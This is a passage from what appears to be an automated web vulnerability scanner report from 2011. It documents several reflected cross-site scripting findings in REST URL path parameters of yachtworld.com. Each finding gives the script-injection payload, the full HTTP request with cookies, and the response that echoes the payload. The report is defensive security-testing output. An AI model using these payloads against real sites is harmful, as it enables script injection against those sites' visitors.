<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&144cb"><script>alert(1)</script>523d00231bb=1&units=Feet&seo=0&checked_boats=2152119&boat_id=2152119&back=/core/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico&boat_id=2152119">
...[SNIP]...

3.105. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c18fb"><script>alert(1)</script>57c0f7d000b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beachc18fb"><script>alert(1)</script>57c0f7d000b/AL/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:24 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:24 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2141315&boat_id=2141315&back=/core/boats/2004/Regulator-32cc-2141315/Orange-Beachc18fb"><script>alert(1)</script>57c0f7d000b/AL/United-States&boat_id=2141315">
...[SNIP]...

3.106. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30a83"><script>alert(1)</script>62580daf9dc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL30a83"><script>alert(1)</script>62580daf9dc/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:08 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:08 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2141315&boat_id=2141315&back=/core/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL30a83"><script>alert(1)</script>62580daf9dc/United-States&boat_id=2141315">
...[SNIP]...

3.107. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f083"><script>alert(1)</script>b717be1f98b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States3f083"><script>alert(1)</script>b717be1f98b HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:31 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F3